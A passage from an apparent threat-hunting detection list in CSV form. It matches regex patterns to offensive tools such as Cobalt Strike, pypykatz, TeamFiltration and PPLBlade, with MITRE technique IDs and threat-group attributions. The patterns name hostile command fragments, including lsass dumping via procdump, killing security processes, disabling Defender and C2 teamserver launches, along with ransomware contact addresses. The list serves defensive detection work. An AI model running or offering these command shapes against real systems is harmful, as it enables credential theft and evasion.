It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/weaselsec/GodPotato-Aggressor-Script","1","0","N/A","N/A","10","1","85","9","2024-01-02T00:22:03Z","2024-01-02T00:02:54Z","60922" "*taskkill /f /im rfusclient.exe*",".{0,1000}taskkill\s\/f\s\/im\srfusclient\.exe.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","60948" "*taskkill /f /im rutserv.exe*",".{0,1000}taskkill\s\/f\s\/im\srutserv\.exe.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","60949" "*taskkill /F /T /IM keepass.exe /FI*",".{0,1000}taskkill\s\/F\s\/T\s\/IM\skeepass\.exe\s\/FI.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","60958" "*taskkill /IM tor.exe /F*",".{0,1000}taskkill\s\/IM\stor\.exe\s\/F.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. 
Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","60997" "*taskkill -f /im chfs.exe*",".{0,1000}taskkill\s\-f\s\/im\schfs\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","61003" "*taskkill -f /im crack.exe*",".{0,1000}taskkill\s\-f\s\/im\scrack\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","61004" "*taskkill -f /im frpc.exe*",".{0,1000}taskkill\s\-f\s\/im\sfrpc\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 
- T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","61005" "*taskkill -f /im iox.exe*",".{0,1000}taskkill\s\-f\s\/im\siox\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","61006" "*taskkill -f /im lazagne.exe*",".{0,1000}taskkill\s\-f\s\/im\slazagne\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","61007" "*taskkill -f /im modify.exe*",".{0,1000}taskkill\s\-f\s\/im\smodify\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","61008" "*taskkill -f /im npc.exe*",".{0,1000}taskkill\s\-f\s\/im\snpc\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","61009" "*taskkill -f /im scrying.exe*",".{0,1000}taskkill\s\-f\s\/im\sscrying\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - 
T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","61010" "*tasklist /fi *Imagename eq lsass.exe*",".{0,1000}tasklist\s\/fi\s.{0,1000}Imagename\seq\slsass\.exe.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","61029" "*tasklist /fi *Imagename eq lsass.exe*do procdump*",".{0,1000}tasklist\s\/fi\s.{0,1000}Imagename\seq\slsass\.exe.{0,1000}do\sprocdump.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","61031" "*TaskShell.exe * -b *.exe*",".{0,1000}TaskShell\.exe\s.{0,1000}\s\-b\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/TaskShell","1","0","N/A","N/A","10","10","56","9","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z","61038" "*TaskShell.exe * -s *SYSTEM*",".{0,1000}TaskShell\.exe\s.{0,1000}\s\-s\s.{0,1000}SYSTEM.{0,1000}","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/TaskShell","1","0","N/A","N/A","10","10","56","9","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z","61039" "*tastypepperoni/PPLBlade*",".{0,1000}tastypepperoni\/PPLBlade.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","61040" "*tastypepperoni/RunAsWinTcb*",".{0,1000}tastypepperoni\/RunAsWinTcb.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","61041" 
"*TaurusOmar/psobf*",".{0,1000}TaurusOmar\/psobf.{0,1000}","offensive_tool_keyword","psobf","PowerShell Obfuscator","T1027 - T1059 - T1564","TA0005","N/A","N/A","Defense Evasion","https://github.com/TaurusOmar/psobf","1","1","N/A","N/A","6","2","171","30","2024-06-07T02:50:43Z","2024-06-07T01:45:12Z","61042" "*tbMangler.py encode *",".{0,1000}tbMangler\.py\sencode\s.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","61043" "*TcbS4uImpersonationVariant.exe*",".{0,1000}TcbS4uImpersonationVariant\.exe.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","61044" "*tCommand = ""windowsdefender://Threatsettings""*CreateObject(""Shell.Application"").ShellExecute(tCommand)*",".{0,1000}tCommand\s\=\s\""windowsdefender\:\/\/Threatsettings\"".{0,1000}CreateObject\(\""Shell\.Application\""\)\.ShellExecute\(tCommand\).{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","61045" "*TCP:gsocket:31337*",".{0,1000}TCP\:gsocket\:31337.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#content #linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","61047" "*tcpClient.connectTCP(*127.0.0.1*1337*",".{0,1000}tcpClient\.connectTCP\(.{0,1000}127\.0\.0\.1.{0,1000}1337.{0,1000}","offensive_tool_keyword","UsoDllLoader","This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading exploit ","T1210.001 - T1055 - T1574.001","TA0007 - TA0002 - TA0001","N/A","N/A","Exploitation tool","https://github.com/itm4n/UsoDllLoader","1","0","N/A","N/A","N/A","4","386","100","2020-06-06T11:05:12Z","2019-08-01T17:58:16Z","61048" "*tcpreplay*",".{0,1000}tcpreplay.{0,1000}","offensive_tool_keyword","tcpreplay","Tcpreplay is a suite of free Open Source utilities for editing and replaying previously captured network traffic. Originally designed to replay malicious traffic patterns to Intrusion Detection/Prevention Systems. it has seen many evolutions including capabilities to replay to web servers.","T1043 - T1049 - T1052 - T1095 - T1102 - T1124 - T1497 - T1557","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://tcpreplay.appneta.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","61050" "*tcpshell.py*",".{0,1000}tcpshell\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","61051" "*tdragon6/Supershell*",".{0,1000}tdragon6\/Supershell.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","61052" "*teamchic@exploit.im*",".{0,1000}teamchic\@exploit\.im.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61054" "*teamchic@jabb.im*",".{0,1000}teamchic\@jabb\.im.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61055" 
"*teamchic@yandex.com*",".{0,1000}teamchic\@yandex\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61056" "*teamchica@yandex.com*",".{0,1000}teamchica\@yandex\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61057" "*TeamFiltration.exe *",".{0,1000}TeamFiltration\.exe\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","61058" "*TeamFiltration\Program.cs*",".{0,1000}TeamFiltration\\Program\.cs.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","61059" "*TeamFiltration-v*-linux-x86_64.zip*",".{0,1000}TeamFiltration\-v.{0,1000}\-linux\-x86_64\.zip.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - 
T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","#linux","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","61060" "*TeamFiltration-v*-macOS-arm64.zip*",".{0,1000}TeamFiltration\-v.{0,1000}\-macOS\-arm64\.zip.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","61061" "*TeamFiltration-v*-macOS-x86_64.zip*",".{0,1000}TeamFiltration\-v.{0,1000}\-macOS\-x86_64\.zip.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","61062" "*TeamFiltration-v*-win-x86_64.zip*",".{0,1000}TeamFiltration\-v.{0,1000}\-win\-x86_64\.zip.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","61063" "*teams_dump.py teams*",".{0,1000}teams_dump\.py\steams.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - 
T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","N/A","9","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","61064" "*teams_dump-main.zip*",".{0,1000}teams_dump\-main\.zip.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","1","N/A","N/A","9","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","61065" "*teamserver * c2-profiles/*",".{0,1000}teamserver\s.{0,1000}\sc2\-profiles\/.{0,1000}","offensive_tool_keyword","cobaltstrike","teamserver cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - 
Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","61066" "*teamserver* no_evasion.profile*",".{0,1000}teamserver.{0,1000}\sno_evasion\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
